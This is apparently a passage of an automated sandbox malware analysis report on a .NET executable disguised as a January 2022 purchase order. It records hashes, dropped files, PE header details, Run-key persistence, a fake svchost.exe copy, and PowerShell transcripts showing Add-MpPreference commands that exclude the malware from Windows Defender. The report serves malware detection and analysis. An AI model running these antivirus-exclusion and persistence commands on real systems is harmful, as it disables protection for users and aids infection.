                              05:33:12 | API Interceptor | 414x Sleep call for process: aspnet_regbrowsers.exe modified
                              05:33:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:50 | API Interceptor | 7x Sleep call for process: svchost.exe modified
                              05:34:22 | API Interceptor | 62x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.log
                              Process: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type: ASCII text, with CRLF line terminators
                              Category: dropped
                              Size (bytes): 1488
                              Entropy (8bit): 5.338732761611821
                              Encrypted: false
                              SSDEEP: 24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5: 608F72EADF7367FD731F4A9838E535BF
                              SHA1: 831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256: EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512: E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious: true
                              Reputation: unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
                              Process:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):22180
                              Entropy (8bit):5.382395220506782
                              Encrypted:false
                              SSDEEP:384:JtCDD3Q3zwbTnNrnVsI1kt04mRdvOOhhrmFdObLAPaC:83QKlntqpIOgrKlf
                              MD5:868B45F63CEA63255972AF887177602C
                              SHA1:E6150AD0AF99DCCA5BA47E38B3917E89C53C2645
                              SHA-256:9576CBC5A5B034E5324ACFD21D2E51F7DF0D25D5D8B730AF1DF88C523632F704
                              SHA-512:925387EDFDC65E27BB93F5648F187D903427636DA16D0C990580EED3156CAB19646A90DC6658EDF2537FEB7B130BBBE457920885A1FD60F3833423FF9AA34D8A
                              Malicious:false
                              Reputation:unknown
                              Preview: @...e...........a.......u.|.........v...@.Z..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rnex2ek.lje.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uypqtat.42m.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2nywgzx.vdr.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj0etfuz.zra.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knth15sn.2xz.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndedftbp.hio.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pswme1px.15w.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qim5i45f.hre.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrcvsx0a.z50.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.8tzwXQ58.20220114053231.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.380010783427229
                              Encrypted:false
                              SSDEEP:96:BZNj2NGqDo1Z7FZfj2NGqDo1ZFqjA0cA0cA0OZh:Tccl
                              MD5:460D1EEA3318EA76817C22353BA78DB0
                              SHA1:220756D03DCA9F8D651664218C71A6D2B227C591
                              SHA-256:E4B62F2EE756CD8C5C7489423AB8E58127CF473AE16E1C8253FDAD9CA61507B2
                              SHA-512:B004764F490524ED9C3B4FC7A8E9F7C3F4C84F237FE0CCC52A1F5E5D2AD5EAA6F25F42B9891135F6302EBEB43238991EC3D0E8B4823FD07226C67FFB29730B98
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053232..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 6684..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053232..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053450..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Cb2iz80h.20220114053303.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.416622514629973
                              Encrypted:false
                              SSDEEP:96:BZrj2NfPqDo1ZvGZQj2NfPqDo1Z1Ln9nznjZRj2NfPqDo1ZecnDnDnsrZCS:joS
                              MD5:6EB4BB056B4FD666EC578F830F7A24C1
                              SHA1:C948BD8B279111AB83F7EFE413F1AA094EF6EE76
                              SHA-256:6C8E95C381C59461EE046EEAF7E1397443A8B105C0E57925C8C3096579017309
                              SHA-512:9BF9099511FEA3FF254E15E2E6F9B7326055BEE64CD89C3B188AB2A9657E63CD571384AFDA41A44A442AFFC97780F6994B89FA4085B19A3437A73527C52C01F9
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053304..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 6008..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053304..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053615.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Kmftd8NL.20220114053244.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.417647435012023
                              Encrypted:false
                              SSDEEP:96:BZMj2NfyqDo1ZwGZVj2NfyqDo1Z1Ln9nznjZZj2NfyqDo1ZDcnDnDnHZy:M
                              MD5:EDED91250DE1A455988D6274C5B9DCBB
                              SHA1:1F72A32B99A6720A6EC28C13AC110645BC3FFED9
                              SHA-256:1F3AE831C246CA98E7651A1615BF35127A008722AC3AD7618D7E7DBF78D70CDF
                              SHA-512:44FDD2EAB6993D00F5A3909B784893D72DB15CB67CF15B87A9BF07405A85BF9EC0950825FB455705E3D28F491E284FF5C80870CFBE7D381F8CFE145B77BE96C3
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053246..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7060..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053246..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053618.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.TjhCOvM7.20220114053243.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.419300447130754
                              Encrypted:false
                              SSDEEP:96:BZHj2Nf1qDo1ZDGZugj2Nf1qDo1ZJLn9nznjZoj2Nf1qDo1ZMcnDnDnaZB:Wc
                              MD5:1553878CE835BF07DFD49311CA17C5AE
                              SHA1:723A3D73B8645D924E55190C42C12F95EEF7568D
                              SHA-256:DC34A98A7FE67DC969F1D49C70BDE76A584FB76A048946D34D6D5E900E914027
                              SHA-512:2CCC216505C0D5D8D12441F425B5E212B728127438DB41900FACC35ADA8E4869E660E0AF922A4F12B53D15A8077EA0C96A0A98F918BB9960D3CE0E9B4D40F009
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053245..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053245..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053627.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.qPOtysNN.20220114053246.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.377594983509322
                              Encrypted:false
                              SSDEEP:96:BZij2NSqDo1ZMFZ5j2NSqDo1ZjqjA0cA0cA0reZVH:hccl
                              MD5:9B6113ADDFA0768FF34C25E0B1CB1532
                              SHA1:76048CA9695F3E41A457017B082C3B2A3EF36DB6
                              SHA-256:26D14F2938E1D6120DDD49F3A9CC599CFB1BD661841643D108AFE088798B0FF1
                              SHA-512:F2399B022F77E04FAD48BF84D4745ABBEC4E9608B3BD04C651901F90F4B046FB3C60246D725A0B30392DAA58B8FFE3949B52253C5A7E9AB1595C78E596ABC51E
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053248..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053557..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):844800
                              Entropy (8bit):7.921306694709134
                              Encrypted:false
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              MD5:8B974D65BF7E334D75F57027821AC628
                              SHA1:F3CCC2D15A771715E6653D470F955F7095E3CD17
                              SHA-256:C2628ACD6B807FACD37A0B0DB1068F80FA2C87702D6A687445A9EC1DC3BC2421
                              SHA-512:668DDAED399D33F32C4BDCCB22D77E9EDF27A707BE8F0901417D566125D30D90BD44E039B03548C9C31D17297BCD2CC3AB5D712CBD918B71EAB1B53CFDA70E11
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 19%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`.....................................J........|................... ..........8............................................ ............... ..H............text....`... ...b.................. ..`.rsrc....|.......~...d..............@..@.reloc....... ......................@..@........................H........X..T)......k...h................................................*V!..H.....s.........*J.(.....(....}....*Z..{"....X}".....}....*n.{(...-...s)...}(....{(...*b.{"...-...($...*..}....*b.{"...-...('...*..}....*..{....o....,...(4...*.{.......%..5...s6.....g...o!...&*..{....o....,..(7....1".(8...*.{.......%..9...s:...o;...&*.r...ps<....#...r...ps<....%....s=....&...*..(>...*..(>....s....}.....{.....}.....{.....} ...*Z.{....-..*.{....{....*N.(.....{.....}....*Z.{....-..*.{

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.921306694709134
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:#NEW ORDER FOR JANUARY 2022.exe
                              File size:844800
                              MD5:8b974d65bf7e334d75f57027821ac628
                              SHA1:f3ccc2d15a771715e6653d470f955f7095e3cd17
                              SHA256:c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
                              SHA512:668ddaed399d33f32c4bdccb22d77e9edf27a707be8f0901417d566125d30d90bd44e039b03548c9c31d17297bcd2cc3ab5d712cbd918b71eab1b53cfda70e11
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`................................

                              File Icon

                              Icon Hash:00828e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4c8089
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                              Time Stamp:0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al

                              Data Directories

                              Name                                 | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xc7f80         | 0x4a         | .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xca000         | 0x7cf2       | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xd2000         | 0xc          | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG          | 0xc7fca         | 0x38         | .text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
